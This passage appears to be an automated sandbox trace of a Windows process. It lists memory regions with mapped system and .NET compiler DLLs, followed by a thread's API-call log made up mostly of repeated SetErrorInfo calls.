id = 562
start_va = 0x7ffe0000
end_va = 0x7ffeffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 563
start_va = 0x7feffb20000
end_va = 0x7feffb20fff
entry_point = 0x7feffb20000
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 564
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 565
start_va = 0x7fffffd6000
end_va = 0x7fffffd6fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd6000"
filename = ""
Region:
id = 566
start_va = 0x7fffffde000
end_va = 0x7fffffdffff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffde000"
filename = ""
Region:
id = 567
start_va = 0x130000
end_va = 0x133fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000130000"
filename = ""
Region:
id = 568
start_va = 0x140000
end_va = 0x140fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000140000"
filename = ""
Region:
id = 569
start_va = 0x150000
end_va = 0x151fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000150000"
filename = ""
Region:
id = 570
start_va = 0x260000
end_va = 0x35ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000260000"
filename = ""
Region:
id = 571
start_va = 0x420000
end_va = 0x420fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000420000"
filename = ""
Region:
id = 572
start_va = 0x776e0000
end_va = 0x777fefff
entry_point = 0x776f5ea0
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 573
start_va = 0x7fefd9d0000
end_va = 0x7fefda3afff
entry_point = 0x7fefd9d30e0
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 574
start_va = 0x10000
end_va = 0x1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 575
start_va = 0x20000
end_va = 0x2ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 576
start_va = 0x160000
end_va = 0x1c6fff
entry_point = 0x160000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 577
start_va = 0x1d0000
end_va = 0x1d0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001d0000"
filename = ""
Region:
id = 578
start_va = 0x1e0000
end_va = 0x1e0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001e0000"
filename = ""
Region:
id = 579
start_va = 0x1f0000
end_va = 0x1f0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001f0000"
filename = ""
Region:
id = 580
start_va = 0x75360000
end_va = 0x75428fff
entry_point = 0x75362df0
region_type = mapped_file
name = "msvcr80.dll"
filename = "\\Windows\\winsxs\\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_88e41e092fab0294\\msvcr80.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_88e41e092fab0294\\msvcr80.dll")
Region:
id = 581
start_va = 0x775e0000
end_va = 0x776d9fff
entry_point = 0x775fa2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 582
start_va = 0x779d0000
end_va = 0x779d6fff
entry_point = 0x779d106c
region_type = mapped_file
name = "psapi.dll"
filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll")
Region:
id = 583
start_va = 0x7efe0000
end_va = 0x7f0dffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 584
start_va = 0x7f0e0000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 585
start_va = 0x538000000
end_va = 0x5381e8fff
entry_point = 0x538000000
region_type = mapped_file
name = "cscomp.dll"
filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\cscomp.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\cscomp.dll")
Region:
id = 586
start_va = 0x7fef1910000
end_va = 0x7fef197efff
entry_point = 0x7fef1911134
region_type = mapped_file
name = "mscoree.dll"
filename = "\\Windows\\System32\\mscoree.dll" (normalized: "c:\\windows\\system32\\mscoree.dll")
Region:
id = 587
start_va = 0x7fef5860000
end_va = 0x7fef5988fff
entry_point = 0x7fef5881d68
region_type = mapped_file
name = "c2r64.dll"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\C2R64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r64.dll")
Region:
id = 588
start_va = 0x7fef5990000
end_va = 0x7fef5a09fff
entry_point = 0x7fef59b2e40
region_type = mapped_file
name = "appvisvstream64.dll"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppvIsvStream64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream64.dll")
Region:
id = 589
start_va = 0x7fef5a10000
end_va = 0x7fef5c45fff
entry_point = 0x7fef5b1e91c
region_type = mapped_file
name = "appvisvsubsystems64.dll"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppvIsvSubsystems64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems64.dll")
Region:
id = 590
start_va = 0x7fefcaf0000
end_va = 0x7fefcb0dfff
entry_point = 0x7fefcaf13b8
region_type = mapped_file
name = "userenv.dll"
filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll")
Region:
id = 591
start_va = 0x7fefd750000
end_va = 0x7fefd75efff
entry_point = 0x7fefd7519b0
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 592
start_va = 0x7fefdd50000
end_va = 0x7fefddeefff
entry_point = 0x7fefdd525a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 593
start_va = 0x7fefde70000
end_va = 0x7fefdf46fff
entry_point = 0x7fefde73274
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 594
start_va = 0x7fefdf50000
end_va = 0x7fefdf5dfff
entry_point = 0x7fefdf51080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 595
start_va = 0x7fefe1c0000
end_va = 0x7fefe3c2fff
entry_point = 0x7fefe1e3330
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 596
start_va = 0x7fefe640000
end_va = 0x7fefe76cfff
entry_point = 0x7fefe68ed50
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 597
start_va = 0x7fefe770000
end_va = 0x7fefe7e0fff
entry_point = 0x7fefe781e20
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 598
start_va = 0x7fefe850000
end_va = 0x7feff5d7fff
entry_point = 0x7fefe8ccebc
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 599
start_va = 0x7feff8c0000
end_va = 0x7feff8defff
entry_point = 0x7feff8c60e8
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 600
start_va = 0x7feff8e0000
end_va = 0x7feff9bafff
entry_point = 0x7feff900760
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 601
start_va = 0x7feff9d0000
end_va = 0x7feffa36fff
entry_point = 0x7feff9db03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 602
start_va = 0x7feffa40000
end_va = 0x7feffb08fff
entry_point = 0x7feffaba874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 603
start_va = 0x200000
end_va = 0x200fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000200000"
filename = ""
Region:
id = 604
start_va = 0x210000
end_va = 0x210fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000210000"
filename = ""
Region:
id = 605
start_va = 0x220000
end_va = 0x220fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000220000"
filename = ""
Region:
id = 606
start_va = 0x230000
end_va = 0x236fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000230000"
filename = ""
Region:
id = 607
start_va = 0x240000
end_va = 0x241fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000240000"
filename = ""
Region:
id = 608
start_va = 0x430000
end_va = 0x52ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000430000"
filename = ""
Region:
id = 609
start_va = 0x5e0000
end_va = 0x5effff
entry_point = 0x0
region_type = private
name = "private_0x00000000005e0000"
filename = ""
Region:
id = 610
start_va = 0x5f0000
end_va = 0x777fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000005f0000"
filename = ""
Region:
id = 611
start_va = 0x780000
end_va = 0x900fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000780000"
filename = ""
Region:
id = 612
start_va = 0x910000
end_va = 0x1d0ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000910000"
filename = ""
Region:
id = 613
start_va = 0x1d10000
end_va = 0x1fdefff
entry_point = 0x1d10000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 614
start_va = 0x1fe0000
end_va = 0x23d2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001fe0000"
filename = ""
Region:
id = 615
start_va = 0x6fff0000
end_va = 0x6fffffff
entry_point = 0x0
region_type = private
name = "private_0x000000006fff0000"
filename = ""
Region:
id = 616
start_va = 0x7fef8f20000
end_va = 0x7fef8f22fff
entry_point = 0x7fef8f20000
region_type = mapped_file
name = "api-ms-win-core-synch-l1-2-0.dll"
filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll")
Region:
id = 617
start_va = 0x7fefdb40000
end_va = 0x7fefdb6dfff
entry_point = 0x7fefdb41010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 618
start_va = 0x7feff710000
end_va = 0x7feff818fff
entry_point = 0x7feff711064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 619
start_va = 0x7fefd9c0000
end_va = 0x7fefd9cffff
entry_point = 0x0
region_type = private
name = "private_0x000007fefd9c0000"
filename = ""
Region:
id = 620
start_va = 0x380000
end_va = 0x38ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000380000"
filename = ""
Region:
id = 621
start_va = 0x390000
end_va = 0x3b2fff
entry_point = 0x390000
region_type = mapped_file
name = "cscompui.dll"
filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\1033\\cscompui.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\1033\\cscompui.dll")
Region:
id = 622
start_va = 0x23e0000
end_va = 0x24dffff
entry_point = 0x0
region_type = private
name = "private_0x00000000023e0000"
filename = ""
Region:
id = 623
start_va = 0x25a0000
end_va = 0x25affff
entry_point = 0x0
region_type = private
name = "private_0x00000000025a0000"
filename = ""
Region:
id = 624
start_va = 0x25b0000
end_va = 0x26affff
entry_point = 0x0
region_type = private
name = "private_0x00000000025b0000"
filename = ""
Region:
id = 625
start_va = 0x2860000
end_va = 0x28dffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002860000"
filename = ""
Region:
id = 626
start_va = 0x7fef13f0000
end_va = 0x7fef1488fff
entry_point = 0x7fef13f2670
region_type = mapped_file
name = "mscoreei.dll"
filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscoreei.dll")
Region:
id = 627
start_va = 0x7fefc910000
end_va = 0x7fefc91bfff
entry_point = 0x7fefc911064
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 628
start_va = 0x250000
end_va = 0x250fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000250000"
filename = ""
Region:
id = 629
start_va = 0x27a0000
end_va = 0x281ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000027a0000"
filename = ""
Region:
id = 630
start_va = 0x7fee38d0000
end_va = 0x7fee426cfff
entry_point = 0x7fee3d1a300
region_type = mapped_file
name = "mscorwks.dll"
filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorwks.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\mscorwks.dll")
Region:
id = 631
start_va = 0x7fefd640000
end_va = 0x7fefd64efff
entry_point = 0x7fefd641010
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 632
start_va = 0x360000
end_va = 0x360fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000360000"
filename = ""
Region:
id = 633
start_va = 0x2700000
end_va = 0x277ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002700000"
filename = ""
Region:
id = 634
start_va = 0x2980000
end_va = 0x29fffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002980000"
filename = ""
Region:
id = 635
start_va = 0x2a00000
end_va = 0x2dfffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002a00000"
filename = ""
Region:
id = 636
start_va = 0x2f10000
end_va = 0x2f8ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002f10000"
filename = ""
Region:
id = 637
start_va = 0x2f90000
end_va = 0x318ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002f90000"
filename = ""
Region:
id = 638
start_va = 0x59c800000
end_va = 0x59c822fff
entry_point = 0x59c800000
region_type = mapped_file
name = "alink.dll"
filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\alink.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\alink.dll")
Region:
id = 639
start_va = 0x370000
end_va = 0x370fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000370000"
filename = ""
Region:
id = 640
start_va = 0x7fefe550000
end_va = 0x7fefe5e8fff
entry_point = 0x7fefe551c10
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 641
start_va = 0x3c0000
end_va = 0x3c0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003c0000"
filename = ""
Region:
id = 642
start_va = 0x7fefd040000
end_va = 0x7fefd056fff
entry_point = 0x7fefd0432b8
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 643
start_va = 0x7fefcd40000
end_va = 0x7fefcd86fff
entry_point = 0x7fefcd41064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 644
start_va = 0x3d0000
end_va = 0x3d0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003d0000"
filename = ""
Region:
id = 645
start_va = 0x530000
end_va = 0x579fff
entry_point = 0x530000
region_type = mapped_file
name = "system.runtime.remoting.dll"
filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\System.Runtime.Remoting.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\system.runtime.remoting.dll")
Region:
id = 646
start_va = 0x2e00000
end_va = 0x2efffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002e00000"
filename = ""
Region:
id = 647
start_va = 0x3190000
end_va = 0x349afff
entry_point = 0x3190000
region_type = mapped_file
name = "system.dll"
filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\System.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\system.dll")
Region:
id = 648
start_va = 0x34a0000
end_va = 0x3793fff
entry_point = 0x34a0000
region_type = mapped_file
name = "system.data.dll"
filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\System.Data.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\system.data.dll")
Region:
id = 649
start_va = 0x37a0000
end_va = 0x3993fff
entry_point = 0x37a0000
region_type = mapped_file
name = "system.xml.dll"
filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\System.XML.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\system.xml.dll")
Region:
id = 650
start_va = 0x39a0000
end_va = 0x3a6cfff
entry_point = 0x39a0000
region_type = mapped_file
name = "system.web.services.dll"
filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\System.Web.Services.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\system.web.services.dll")
Region:
id = 651
start_va = 0x3a70000
end_va = 0x3ecafff
entry_point = 0x3a70000
region_type = mapped_file
name = "mscorlib.dll"
filename = "\\Windows\\assembly\\GAC_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\mscorlib.dll" (normalized: "c:\\windows\\assembly\\gac_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\mscorlib.dll")
Region:
id = 652
start_va = 0x7fef1af0000
end_va = 0x7fef1b1bfff
entry_point = 0x7fef1af0000
region_type = mapped_file
name = "mscorpe.dll"
filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorpe.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\mscorpe.dll")
Region:
id = 653
start_va = 0x3e0000
end_va = 0x3e0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003e0000"
filename = ""
Region:
id = 654
start_va = 0x516f00000
end_va = 0x516fc5fff
entry_point = 0x516f24570
region_type = mapped_file
name = "diasymreader.dll"
filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\diasymreader.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\diasymreader.dll")
Region:
id = 655
start_va = 0x3ed0000
end_va = 0x3fcffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003ed0000"
filename = ""
Thread:
id = 30
os_tid = 0xba4
[0060.521] SysStringByteLen (bstr="4") returned 0x2
[0060.525] SysStringByteLen (bstr="DEBUG") returned 0xa
[0060.525] SysStringByteLen (bstr="System.dll|System.Runtime.Remoting.dll|System.Data.dll|System.Xml.dll|System.Web.Services.dll") returned 0xba
[0060.525] SysStringLen (param_1=0x0) returned 0x0
[0060.525] SysStringLen (param_1=0x0) returned 0x0
[0060.525] SysStringByteLen (bstr="DEBUG") returned 0xa
[0060.525] SysStringLen (param_1=0x0) returned 0x0
[0060.525] SysStringByteLen (bstr="DEBUG") returned 0xa
[0060.525] SysStringByteLen (bstr="4") returned 0x2
[0060.525] SysStringByteLen (bstr="System.dll|System.Runtime.Remoting.dll|System.Data.dll|System.Xml.dll|System.Web.Services.dll") returned 0xba
[0060.527] SysStringByteLen (bstr="DEBUG") returned 0xa
[0060.527] SysStringByteLen (bstr="4") returned 0x2
[0060.527] SysStringByteLen (bstr="System.dll|System.Runtime.Remoting.dll|System.Data.dll|System.Xml.dll|System.Web.Services.dll") returned 0xba
[0060.571] CoCreateInstance (rclsid=0x538005b10*(Data1=0xe5cb7a31, Data2=0x7512, Data3=0x11d2, Data4=([0]=0x89, [1]=0xce, [2]=0x0, [3]=0x80, [4]=0xc7, [5]=0x92, [6]=0xe5, [7]=0xd8)), pUnkOuter=0x0, dwClsContext=0x15, riid=0x538005b90*(Data1=0x31bcfce2, Data2=0xdafb, Data3=0x11d2, Data4=([0]=0x9f, [1]=0x81, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0xa0, [7]=0xa3)), ppv=0x12fd88)
[0060.591] SysStringLen (param_1=0x0) returned 0x0
[0060.591] SysStringLen (param_1="System.dll|System.Runtime.Remoting.dll|System.Data.dll|System.Xml.dll|System.Web.Services.dll") returned 0x5d
[0060.634] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.658] SysStringByteLen (bstr="DEBUG") returned 0xa
[0060.658] SysStringByteLen (bstr="DEBUG") returned 0xa
[0060.731] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.731] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.748] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.748] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.796] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.796] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.840] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.840] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.854] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.854] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.907] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.907] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.921] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.929] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.938] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.946] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.950] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.950] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.958] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.961] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.962] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.962] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.972] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.976] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.976] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.977] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.977] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.978] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.979] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.980] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.980] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.981] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.981] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.982] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.982] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.992] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.992] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.992] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.992] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.992] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.992] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.992] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.993] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.993] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.993] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.993] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.993] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.993] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.993] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.993] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.993] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.993] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.993] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.993] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.993] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.993] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.993] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.993] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.993] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.993] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.993] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.993] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.993] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.994] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.994] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.994] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.994] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.994] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.994] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.994] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.994] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.994] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.994] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.994] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.994] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.994] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.994] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.994] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.994] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.994] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.994] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.994] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.994] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.994] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.995] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.995] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.995] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.995] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.995] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0060.995] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
